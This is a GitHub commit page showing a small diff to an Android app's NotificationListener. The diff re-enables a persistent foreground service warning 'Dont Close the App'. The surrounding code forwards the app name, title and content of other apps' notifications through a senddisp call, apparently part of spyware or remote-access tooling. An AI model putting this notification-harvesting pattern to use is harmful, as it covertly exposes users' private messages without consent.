Skip to content

Commit

Permalink
Update NotificationListener.java
Browse files Browse the repository at this point in the history
  • Loading branch information
swagkarna authored Jan 18, 2022
1 parent 9afb6c2 commit 6398b6c
Showing 1 changed file with 2 additions and 2 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -43,9 +43,9 @@ public void run() {
try {
if(!appName.equals("com.velociraptor.raptor")){
senddisp("App Name : " + appName + " " + "Title : " + title + " " + "Content : " + Content);
/* Intent serviceIntent = new Intent(NotificationListener.this, ForegroundService.class);
Intent serviceIntent = new Intent(NotificationListener.this, ForegroundService.class);
serviceIntent.putExtra("inputExtra", "Warning !! Dont Close the App");
ContextCompat.startForegroundService(NotificationListener.this, serviceIntent);*/
ContextCompat.startForegroundService(NotificationListener.this, serviceIntent);
}
} catch (IOException e) {
e.printStackTrace();
Expand Down

0 comments on commit 6398b6c

Please sign in to comment.